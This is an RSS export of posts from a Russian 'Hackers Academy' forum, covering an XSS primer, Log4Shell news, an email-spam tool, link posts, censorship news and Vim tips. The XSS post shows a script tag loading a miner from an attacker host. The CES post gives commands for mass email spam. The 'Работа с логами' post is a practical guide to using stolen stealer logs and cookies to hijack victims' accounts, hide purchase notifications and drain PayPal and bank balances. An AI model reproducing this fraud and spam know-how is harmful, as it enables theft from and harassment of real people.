<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://hacknet.6bb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Hackers Academy</title>
		<link>https://hacknet.6bb.ru/</link>
		<description>Hackers Academy</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 08 Apr 2022 21:20:03 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>XSS инъекции для чайников - часть первая</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=86#p86</link>
			<description>&lt;p&gt;Привет хакерам! На связи Ugnikinn, сегодня расскажу вам что такое XSS и как его используют. Погнали!&lt;br /&gt;Что такое XSS?&lt;br /&gt;XSS (Межсайтовый скриптинг, Cross-Site Scripting) это внедрение HTML/CSS/JavaScript кода в базу данных сайта для его будущего исполнения браузером при загрузке одной из страниц сайта. То есть браузер при загрузке заражённой страницы выполнит внедрённый в эту страницу вредоносный код.&lt;br /&gt;Происходит это обычно следующим образом - хакер ищет на сайте форму, данные из которой будут в дальнейшем отображаться на одной из страниц. Это может быть любое поле ввода на сайте, результаты которого будут видеть другие люди - форма авторизации, поле создания поста на блог площадке и т. д. В форму хакер помимо обычного текста, который туда нужно ввести, вводит код, исполняемый браузером при его обычном отображении. Код может быть любым - от рекламы и JS-майнеров до опасных вирусов, которые могут вырваться за рамки браузера или жучок, способный даже получить доступ к базе данных сайта, если он сохранится там.&lt;br /&gt;Обычно для того чтобы можно было в любой момент изменить содержимое заражённой страницы, используют JavaScript, подгружающийся с страницы, доступ к которой имеет хакер. Делается это с помощью &amp;lt;script src=&amp;quot;[путь к коду JavaScript]&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;. Обычно сайты блокируют спецсимволы в формах для того чтобы защититься от атак, но хакеры шифруют этот код так, что его не сможет распознать защита, но он тем не менее исполняется в браузере.&lt;br /&gt;Возьмём для примера вымышленную блог платформу Blogex. Это площадка где люди могут вести свой блог и т. п. Однажды хакер под ником CrazyMad_ решил заработать на этом сайте. По-быстрому написал JS-майнер и решил действовать. Он купил популярный аккаунт в Blogex, повыкладывал посты недельку и потом решил выложить заражённый пост. Он залил свой код с майнером на хостинг и потом написал пост, но в конце поста добавил код &amp;lt;script src=&amp;quot;https://crazymad_js.superhosting.su/blogex_miner/&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;, за предварительно превратив его в ASCII-код. Затем CrazyMad_ опубликовал пост, и всё!. Теперь как только он попадёт в ленту к его подписчикам, на их компьютере запустится майнер и займёт всю оперативную память и компьютер зависнет. Единственный способ прекратить этот ад - перезагрузить компьютер. И каждый раз, когда браузер будет загружать заражённый пост, компьютер будет превращаться в личный майнер CrazyMad_, пока его не перезагрузят.&lt;br /&gt;На этом всё! В следующей статье я покажу как применять XSS на практике.&lt;a href=&quot;https://upforme.ru/uploads/001b/01/6c/2/807053.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://upforme.ru/uploads/001b/01/6c/2/t807053.jpg&quot; alt=&quot;https://upforme.ru/uploads/001b/01/6c/2/t807053.jpg&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Fri, 08 Apr 2022 21:20:03 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=86#p86</guid>
		</item>
		<item>
			<title>«Интернет в огне»: критическая уязвимость Log4Shell терроризирует онла</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=85#p85</link>
			<description>&lt;p&gt;«Интернет в огне»: критическая уязвимость Log4Shell терроризирует онлайн-сервисы&lt;br /&gt;&lt;a href=&quot;https://upforme.ru/uploads/001b/01/6c/2/429762.jpg&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://upforme.ru/uploads/001b/01/6c/2/t429762.jpg&quot; alt=&quot;https://upforme.ru/uploads/001b/01/6c/2/t429762.jpg&quot; /&gt;&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Критическая уязвимость в Java, в библиотеке log4j, которая используется в тысячах сервисов, начиная от Minecraft и заканчивая Apple Cloud, быстро превращается в серьезную угрозу для организаций по всему миру. Уязвимости подвержены сервера Apple, Valve, Microsoft и других.&lt;/p&gt;
						&lt;p&gt;&amp;#160; «Интернет сейчас в огне», — сказал журналистам Адам Мейерс, старший вице-президент компании Crowdstrike, занимающейся кибербезопасностью. — «Люди изо всех сил стараются исправить это, и в то же время самые разные люди пытаются это использовать». В пятницу Мейерс сказал, что за 12 часов, прошедших с момента обнаружения уязвимости, она была «полностью поставлена на вооружение», и злоумышленники разработали и распространили инструменты для ее использования.&lt;/p&gt;
						&lt;p&gt;Уязвимость позволяет злоумышленникам удаленно выполнять код на уязвимых серверах, давая им возможность импортировать вредоносное ПО, которое может полностью скомпрометировать любые машины.&lt;br /&gt;Уязвимость обнаружена в log4j, библиотеке логирования Java-программ с открытым исходным кодом. Ее используют тысячи игр и приложений, в том числе облачные сервера и корпоративное ПО. Почти каждая сетевая система безопасности запускает какой-то процесс регистрации, что дает огромные возможности популярным библиотекам, таким как log4j. Затронуты все системы и службы, использующие библиотеку логирования Java, Apache Log4j между версиями 2.0 и 2.14.1, включая многие службы и приложения, написанные на Java.&lt;/p&gt;
						&lt;p&gt;Уязвимость, получившая название «Log4Shell», может стать самой серьезной, обнаруженной за последние годы. Ей подвержены крупные компании и даже сайты правительства стран. С её помощью даже новички в области программирования могут получить доступ к внутренним сетям, где они могут похищать ценную информацию, устанавливать вредоносные программы, стирать важные данные и так далее.&lt;br /&gt;Мне сложно представить себе компанию, для которой это не риск. Неисчислимые миллионы серверов работают с log4j, полные последствия не будут известны в течение нескольких дней.&lt;/p&gt;
						&lt;p&gt;Амит Йоран, гендиректор компании Tenable, занимающейся кибербезопасностью, назвал Log4Shell «самой большой и самой критической уязвимостью последнего десятилетия». «и, возможно, самой большой в истории современных компьютеров».&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Одной из первых публично об обнаружении уязвимости рассказала группа реагирования на чрезвычайные компьютерные ситуации Новой Зеландии. Тогда же, в четверг, через несколько часов был выпущен патч. Apache об уязвимости, обнаруженной в её ПО, еще 24 ноября сообщила Alibaba. На разработку и выпуск фикса ушло две недели.&lt;/p&gt;
						&lt;p&gt;Хотя патч сейчас и выпущен, мало кто знает о наличии уязвимости (за исключением злоумышленников), поэтому многие сервера остаются уязвимыми. Так, как сообщает LunaSec, уже обнаружено, что Steam и iCloud от Apple сейчас уязвимы.&lt;br /&gt;Миллионы приложений используют Log4j для ведения журналов, и все, что нужно сделать злоумышленнику — это заставить приложение зарегистрировать специальную строку.&lt;/p&gt;
						&lt;p&gt;Пока что исследователи обнаружили доказательства того, что уязвимость может быть использована на серверах таких компаний, как Apple, Amazon, Twitter и Cloudflare.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Fri, 08 Apr 2022 21:16:39 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=85#p85</guid>
		</item>
		<item>
			<title>CES - спамим кастомным текстом</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=84#p84</link>
			<description>&lt;p&gt;Салом, КулХацкер!&lt;br /&gt; Мы решили сделать обзор новой нашей утилиты для Email спама кастомным текстом.&lt;br /&gt; Напишите в комментариях, хотели бы вы видеть такие обзоры.&lt;br /&gt;Custom Email Spam (CES) - утилита для Email спама. Её особенность в том, что она спамит кастомным текстом, а не просто вбивает емейл жертвы в полях регистрации.&lt;/p&gt;
						&lt;p&gt; В общем, поэтому и называется Custom Email Spam, а не Email Bomber. Вся прелесть CES в том, что он использует не API сервисов, а протокол SMTP. CES может спамить массово - с заданных емейл адресов на заданные емейл адреса. В первой версии нужно указывать SMTP сервер и порт, но в будущих версиях планируется автоматическое распознавание сервера по домену и словарь - для какого домена какой сервер. К примеру для GMail, Yandex, Mail.ru и Outlook скрипт будет использовать их сервера, а для остальных использовать шаблон &amp;quot;smtp.[example.com]:465&amp;quot;. Ну а пока что будут просто шпаргалки по SMTP серверам в файле README.md репозитория. CES может отправлять письма определенным количеством и с определенной задержкой. К примеру, в файл &amp;quot;from.txt&amp;quot; (который содержит почты-отправители в формате &amp;quot;[почта]:[пароль]:[SMTP сервер]:[SMTP порт]&amp;quot;), мы записали две почты - &amp;quot;example1@gmail.com:qwe123qwe123:smtp.gmail.com:465&amp;quot; и &amp;quot;example2@gmail.com:qwerty123456:smtp.gmail.com:465&amp;quot;, в файл &amp;quot;to.txt&amp;quot; (который содержит почты-получатели) - &amp;quot;example3@gmail.com&amp;quot; и &amp;quot;example4@gmail.com&amp;quot;, а в файл &amp;quot;mail.txt&amp;quot; (который содержит письмо) - &amp;quot;Привет!&amp;quot;. Запускаем скрипт и вводим количество писем - 3, и задержку в секундах - 5. При таких параметрах произойдёт следующее - сначала с почты example1@gmail.com отправится 3 письма с текстом &amp;quot;Привет!&amp;quot; на example3@gmail.com с задержкой в пять секунд между письмами, а потом точно также эти 3 письма с такой же задержкой и текстом отправятся на почту example4@gmail.com. Потом всё это повторится, только вместо example1@gmail.com письма будут отправляться с почты example2@gmail.com. Каждый получатель получит 6 писем с текстом &amp;quot;Привет!&amp;quot;, 3 из них будут отправлены example1@gmail.com, а 3 - example2@gmail.com. Вроде всё просто и эффективно.&lt;br /&gt;Установка (BASH):&lt;br /&gt;cd &amp;amp;&amp;amp; pkg install git python -y &amp;amp;&amp;amp; git clone &lt;a href=&quot;https://github.com/academyofhackers/CES/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://github.com/academyofhackers/CES/&lt;/a&gt;&lt;br /&gt;Использование (BASH):&lt;br /&gt;cd &amp;amp;&amp;amp; cd CES&lt;br /&gt;Затем заносите почты-отправители в файл &amp;quot; from.txt&amp;quot; в формате [почта]:[пароль]:[SMTP сервер]:[SMTP порт], почты-получатели в файл &amp;quot;to.txt&amp;quot; и письмо в файл &amp;quot;mail.txt&amp;quot; и прописываем:&lt;br /&gt;python3 ces.py&lt;/p&gt;
						&lt;p&gt;UPD: Кто захочет стырить код - не получится, на скрипте лицензия стоит и если я замечу, что ты своровал код, то я смогу забанить твой гитхаб навсегда))). И если вы будете показывать этот скрипт на своём&amp;#160; канале и т.д. - убедительная просьба оставлять ссылку на наш канал в Telegram, группу ВК, страницу Facebook, канал в Дзен, или на профиль админов на HAF.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://github.com/academyofhackers/CES/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://github.com/academyofhackers/CES/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:47:39 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=84#p84</guid>
		</item>
		<item>
			<title>Генератор BTC чекеров</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=83#p83</link>
			<description>&lt;p&gt;Наш генератор BTC &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://github.com/academyofhackers/btc-check-generator&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://github.com/academyofhackers/btc-check-generator&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:45:10 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=83#p83</guid>
		</item>
		<item>
			<title>Глаз бога от Hackers Academy</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=82#p82</link>
			<description>&lt;p&gt;Наш бот в Телеграм&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://t.me/Quick_OSINT_bot?start=1751561225&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://t.me/Quick_OSINT_bot?start=1751561225&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:44:16 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=82#p82</guid>
		</item>
		<item>
			<title>Глаз бога от Hackers Academy</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=81#p81</link>
			<description>&lt;p&gt;Наш бот в телеграм&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://t.me/Quick_OSINT_bot?start=1751561225&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://t.me/Quick_OSINT_bot?start=1751561225&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:43:39 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=81#p81</guid>
		</item>
		<item>
			<title>Генератор BTC чекерос</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=80#p80</link>
			<description>&lt;p&gt;Генератор BTC чеков для активации в Telegram боте @BTC_CHANGE_BOT &lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://github.com/academyofhackers/btc-check-generator&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://github.com/academyofhackers/btc-check-generator&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:42:27 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=80#p80</guid>
		</item>
		<item>
			<title>CES</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=79#p79</link>
			<description>&lt;p&gt;Мой скрипт для массовой рассылки рекламы. Зависимости устанавливать не надо, т.к. здесь используется для рассылки встроенная библиотека&lt;br /&gt;smtplib&lt;br /&gt;. Инструкция по установке и использованию в GitHub репозитории.&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;https://github.com/academyofhackers/CES/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://github.com/academyofhackers/CES/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:40:21 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=79#p79</guid>
		</item>
		<item>
			<title>Работа с логами</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=78#p78</link>
			<description>&lt;p&gt;Салом КулХацкер!&lt;br /&gt;Логи со стилера. Где все деньги ?&lt;br /&gt;Что такое стилер?&lt;br /&gt;Это программный код, который служит для кражи паролей и прочих данных с компьютера. Добытые данные отправляются на почту, либо на FTP.&lt;/p&gt;
						&lt;p&gt;Как происходит сам процесс заражения?&lt;/p&gt;
						&lt;p&gt;Первым делом человек создает код на каком-либо языке программирования, затем использует знания криптографии и скрывает стиллер таким образом, чтобы его не нашли антивирусы. Он может быть везде, даже в самой обычной картинке. Довольно частый способ распространения этой заразы — заражение всевозможных crack&#039;ов (активаторов), например, активатор Windows 7, который ищет почти каждый мамонт, установивший свеженькую ОС на свой компьютер. Скачал, активировал Windows, а на компе поселился стилер, который отныне будет воровать все твои данные и отправлять их хакеру Пете из 5Б.&lt;/p&gt;
						&lt;p&gt;Так что же именно ворует стилер?&lt;/p&gt;
						&lt;p&gt;Чаще всего, целью являются сохраненные пароли из браузеров: всевозможные аккаунты (eBay, Amazon, Walmart и т.д.), банки, крипто валютные биржи и кошельки. Также есть некоторые стилеры, получающие пароли с онлайн игр, которые сохранены в клиенте игры. Отправка паролей может происходить в открытую — т.е. уже расшифрованные пароли передаются на GATE, FTP или email, или же в зашифрованном виде.&lt;/p&gt;
						&lt;p&gt;Что такое ЛОГИ?&lt;/p&gt;
						&lt;p&gt;Это все данные, которые стилеру удалось украсть и выслать хакеру. Обычно логи включают в себя:&lt;/p&gt;
						&lt;p&gt;Cookie файлы с зараженного компьютера. Может содержать несколько файлов с названиями браузеров, используемых пользователем ПК.&lt;br /&gt;Список логинов, паролей и сайтов пользователя (например — Amazon.com, login: tupica777, pass: ochko123).&lt;br /&gt;Файл с настройками системы и оборудованием зараженного компьютера (используемая операционная система, IP-адрес, железо).&lt;br /&gt;Снимок экрана в момент заражения. Так можно понять как и в какой момент стилер &amp;quot;залез&amp;quot; на комп несчастной жертве. А также это даёт немного информации о пользователе.&lt;br /&gt;...&lt;/p&gt;
						&lt;p&gt;Допустим, что ты получил эти самые логи, ну или добыл их самостоятельно, если ты крутой кардер со своим стилером. Что делать дальше? Теперь тебе нужно максимально близко подстроиться под своего КХ. Пробивай его IP и узнавай адрес, больше всего интересует ZIP-код и город, подбирай прокси/тунель под эти данные. Настраивай систему:&lt;/p&gt;
						&lt;p&gt;Меняй часовой пояс.&lt;br /&gt;Подбирай UserAgent.&lt;br /&gt;Подстраивай разрешение экрана.&lt;br /&gt;Короче говоря, меняй все свои параметры и настройки на те данные, которые известны о КХ.&lt;br /&gt;Итак, всё настроено! Заходишь на Whoer.net, теперь ты — тот самый американец или американка. Чисти куки, я считаю, что после хуера это делать необходимо. Далее загружай в браузер куки, полученные со стилера. Если ты не используешь сферу, то ищи расширение на свой браузер для импорта/экспорта куков. Теперь смело иди на Google.com и смотри как автоматически залетаешь на одну из почт КХ (это случается в 99% случаев), если этого не произошло, то высматривай в списке лог/пас почтовые аккаунты. Почта крайне важна для дальнейшей работы, так как практически при любом твоём действии — будь то перевод средств с PayPal аккаунта или покупка на Amazon.com 4К телевизора, который ты уже договорился отправить на дропа — на почту КХ приходит уведомление об этом действии. Так вот доступ к почте нужен для того, чтобы это оттуда вычистить!&lt;/p&gt;
						&lt;p&gt;Всё!&lt;/p&gt;
						&lt;p&gt;Побежал теперь по всем аккаунтам этого недотёпы, покупая шмотки, технику или что там твоей преступной душе угодно. Понятное дело, что наглеть не стоит, лучше, конечно же, действовать аккуратно. Купил товар, скрыл покупку в шопе (если это eBay или Amazon), пошёл на почту, удалил сообщение о получении Order&#039;а и ждёшь получение трека, периодически чекая почту КХ (тебе ведь и это письмо надо будет удалить).&lt;/p&gt;
						&lt;p&gt;Работа с логами, изображение №2&lt;br /&gt;Примерно так выглядит работа с обычной вещевухой при помощи логов.&lt;/p&gt;
						&lt;p&gt;Кроме этого, тебе может попасться PayPal аккаунт с нормальным балансом. То есть, залетев на такой аккаунт, ты можешь попытаться перевести все деньги КХ, например, на свой раскачанный саморег, который только и ждет нового поступления $$$.&lt;/p&gt;
						&lt;p&gt;Работа с логами, изображение №3&lt;br /&gt;Например, вот такой баланс, неплохо такое вывести, да?&lt;/p&gt;
						&lt;p&gt;Нельзя забывать и про банковские аккаунты, на которых тоже довольно часто имеются нехилые запасы деньжат. Хотя необходимо понимать, что для вывода с БА только лишь одного желания маловато! Нужны некоторые навыки и понимание процесса, но помни, что нет ничего невозможного, друг.&lt;/p&gt;
						&lt;p&gt;Работа с логами, изображение №4&lt;br /&gt;Именно исходя из всего выше написанного, я и сделал для себя вывод, что ЛОГИ — это одна из самых прибыльных и денежных тем в кардинге. Да, тут очень многое зависит от материала, то есть от его качества. На рынке существует масса сомнительных предложений от всевозможных перекупов.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:36:31 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=78#p78</guid>
		</item>
		<item>
			<title>BGram-7.8.0 (74802</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=77#p77</link>
			<description>&lt;p&gt;BGram-7.8.0 (74802)&lt;br /&gt;&amp;#10004;&amp;#65039; Stable&amp;#8288;&lt;/p&gt;
						&lt;p&gt;• Remove hidden chats from global media section when &amp;quot;Remove hidden chats from search&amp;quot; is enable.&lt;/p&gt;
						&lt;p&gt;BGram-7.8.0 (74800)&lt;br /&gt;&amp;#10004;&amp;#65039; Stable&amp;#8288;&lt;/p&gt;
						&lt;p&gt;• Source code update to 7.8.0 (2360).&lt;br /&gt;• Unlimited marked messages in any chat.&lt;br /&gt;• All Marked messages in sidebar with ability to sort them by added date or msg original date.&lt;br /&gt;• Backup and restore for marked messages. &lt;br /&gt;• Update edited marked messages manually all at ones.&lt;br /&gt;• Multi mark messages in chat.&lt;br /&gt;• People Nearby removed from sidebar. Now everything related to communication (including Contacts, New group/channel, People nearby, Invite friends) is in the Chats section.&lt;br /&gt;• Indonesian translation added.&lt;/p&gt;
						&lt;p&gt;Download - &lt;a href=&quot;https://play.google.com/store/apps/details?id=org.telegram.BifToGram&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://play.google.com/store/apps/deta &amp;#8230; .BifToGram&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:34:39 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=77#p77</guid>
		</item>
		<item>
			<title>Сервис ИИ для проверки и оптимизации кода</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=76#p76</link>
			<description>&lt;p&gt;GitHub Copilot - сервис на основе искусственного интеллекта для проверки и улучшения кода&lt;br /&gt;Это совместный проект от Microsoft и OpenAI. Сервис просматривает ваш код и дает рекомендации по его улучшению, на основе технологии искусственного интеллекта.&lt;br /&gt;Copilot просматривает существующий код, комментарии к коду и положение курсора. На основе этих данных он предлагает добавить одну или несколько строк кода. Пока что лучше всего Copilot работает с JavaScript/TypeScript и Python.&lt;br /&gt;Ссылка на сервис&lt;br /&gt;&lt;a href=&quot;https://copilot.github.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://copilot.github.com/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:31:58 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=76#p76</guid>
		</item>
		<item>
			<title>Курс Python для решения бизнес-задач</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=75#p75</link>
			<description>&lt;p&gt;&lt;a href=&quot;https://gb.ru/professions/python-for-business&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://gb.ru/professions/python-for-business&lt;/a&gt;&lt;br /&gt;Курс Python для решения бизнес-задач&lt;br /&gt;&lt;a href=&quot;https://cloud.mail.ru/public/t4Dp/TE2KB6aGY/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://cloud.mail.ru/public/t4Dp/TE2KB6aGY/&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Jul 2021 21:29:20 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=75#p75</guid>
		</item>
		<item>
			<title>Для замедления трафика Twitter Роскомнадзор использует новую технологи</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=74#p74</link>
			<description>&lt;p&gt;Россия использует новую технологию для замедления интернет-трафика на территории страны, сообщают специалисты организации Censored Planet. По их словам, это первый известный случай, когда правительство подвергает цензуре интернет-контент, ограничивая трафик компании, а не блокируя доступ к ее услугам.&lt;/p&gt;
						&lt;p&gt;Речь идет о замедлении трафика Twitter Роскомнадзором за неисполнение требований российского законодательства по удалению противоправного контента. Как сообщает Censored Planet, для этого регулятор использует ТСПУ (технические средства противодействия угрозам), пришедшие на смену СОРМ (система технических средств для обеспечения функций оперативно-розыскных мероприятий).&lt;/p&gt;
						&lt;p&gt;СОРМ, состоящая из специальных сетевых устройств, установленных в дата-центрах операторов связи, позволяет блокировать доступ к определенным доменам, добавляя их в реестр запрещенных ресурсов. При наличии решений суда и Роскомнадзора операторы связи должны менять соответствующие настройки межсетевого экрана и блокировать трафик этих доменов.&lt;/p&gt;
						&lt;p&gt;Однако в последние годы стало ясно, что такую блокировку можно обойти с помощью прокси- и VPN-сервисов. Кроме того, компании наподобие Telegram нашли способы обхода блокировки с помощью домен-фронтинга (использования разных доменных имен на разных уровнях HTTPS-соединения для незаметного подключения к другому целевому домену, не заметному третьим сторонам, отслеживающим запросы и соединения).&lt;/p&gt;
						&lt;p&gt;Новые ТСПУ работают не так, как СОРМ. Во-первых, они не находятся под контролем операторов связи и управляются непосредственно Роскомнадзором. Во-вторых, ТСПУ развертываются на два шага ближе к конечному пользователю, чем СОРМ. В-третьих, эти устройства работают не как традиционные межсетевые экраны, а скорее, как сетевые DPI-фильтры. Решения на базе DPI позволяют видеть содержимое сетевых пакетов и реальное место их назначения, даже если соединение шифруется с помощью TLS.&lt;/p&gt;
						&lt;p&gt;Как пояснили эксперты Censored Planet, ТСПУ работают путем анализа расширения SNI протокола TLS, благодаря чему Роскомнадзор может определить, к какому домену подключается пользователь, еще до того, как соединение будет зашифровано.&lt;/p&gt;
						&lt;p&gt;Инцидент с Twitter является первым случаем использования ТСПУ. По словам экспертов, это объясняет, почему первый запуск системы прошел неудачно – слишком широкое правило фильтрации привело к замедлению не только трафика Twitter, но других доменов.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Thu, 15 Apr 2021 18:12:55 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=74#p74</guid>
		</item>
		<item>
			<title>VIM в качестве IDE</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=73#p73</link>
			<description>&lt;p&gt;VIM в качестве IDE&lt;br /&gt;Салом КулХацкер!&lt;/p&gt;
						&lt;p&gt;VIM в качестве IDE, изображение №1&lt;br /&gt;В самом начале пути девелопера, осознавшего что все это время он жил неправильно пока не начал использовать VIM, подстерегают страшные вещи. Одна из них - первичная настройка VIM в качестве IDE. Вооружившись клавой он заходит в гугл - и там ему советуют поставить, значит NerdTree чтобы православно переключаться между файлами - и cscope, чтобы иметь возможность использовать все эти автодополнения кода.&lt;/p&gt;
						&lt;p&gt;Но тут возникает вопрос. Я же не все время сижу и нашлепываю что-то на C++. Иногда мне надо и html нашлепать и python тоже, и вообще таксказать latex я тоже юзаю. Как жить дальше ?&lt;/p&gt;
						&lt;p&gt;Сегодня меня наконец достали этим вопросом и я так подумал-подумал и нашлепал вот такой краткий ликбез.&lt;/p&gt;
						&lt;p&gt;1) Vim на самом деле умеет замечательно распознавать типы файлов. Он магическим образом узнает где тут html а где latex (ну не таким уж и магическим - но не важно). А еще у него есть такая замечательная возможность: использовать для разных файлов свой конфиг.&lt;/p&gt;
						&lt;p&gt;Для этого, внутри директории с настройками (для Linux это ~/.vim) необходимо создать путь after/ftplugin. Внутри ftplugin можно создавать такие конфиги. Имя этого конфига должно совпадать с типом файла, для которого он предназначен и расширением .vim. Так, для просмотра манов - это man.vim, для Си - это c.vim, LaTex - tex.vim, ассемблер - asm.vim и.т.д.&lt;/p&gt;
						&lt;p&gt;Вот внутри этих файлов совершенно не напрягаясь и не мудрствуя лукаво можно назначать сочетания клавиш для того чтобы скомпилить/запустить все что угодно.&lt;/p&gt;
						&lt;p&gt;Для примера - вот что у меня находится в c.vim:&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;map &amp;lt;F5&amp;gt; :wall \| make&amp;lt;Cr&amp;gt;:!cscope -R -b&amp;lt;Cr&amp;gt;:cscope add cscope.out&amp;lt;Cr&amp;gt;&amp;lt;Cr&amp;gt;:cl&amp;lt;Cr&amp;gt; &lt;br /&gt;А вот tex.vim&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;map &amp;lt;F5&amp;gt; :!pdflatex &amp;lt;C-R&amp;gt;%&amp;lt;CR&amp;gt;&lt;br /&gt;Соответственно для разных файлов кнопалка F5 работает по разному. HTML открывает в браузере, компиляет c++, собирает PDF из tex и так далее.&lt;/p&gt;
						&lt;p&gt;==========================&lt;/p&gt;
						&lt;p&gt;2) Цветовые схемы. Многие из тех кто пытался найти схему под себя сталкивались с тем что это сделать не так просто как хотелось - бы. Некоторые просто не подходят, некоторые другие работают непредсказуемо. Тоесть при переключении одной на другую появляются всякие чудеса, некоторый текст оказывается темно-синим на черном фоне что доставляет особое удовольствие.&lt;/p&gt;
						&lt;p&gt;Казалось-бы штука незначительная - но напрягает. А решается она точно так же. В каждом конфиге из п.1 просто прописываем нужную тему. А саму тему создаем сами: ~/.vim/colors/MyCoolName.vim&lt;/p&gt;
						&lt;p&gt;Начало можно спереть из какой-нибудь другой темы, скажем так:&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;highlight clear&lt;br /&gt;if exists(&amp;quot;syntax_on&amp;quot;)&lt;br /&gt;&amp;#160; syntax reset&lt;br /&gt;endif&lt;/p&gt;
						&lt;p&gt;set background=dark&lt;br /&gt;set t_Co=256&lt;br /&gt;let g:colors_name=&amp;quot;DartPhoenix&amp;quot;&lt;/p&gt;
						&lt;p&gt;let python_highlight_all = 1&lt;br /&gt;let c_gnu = 1&lt;/p&gt;
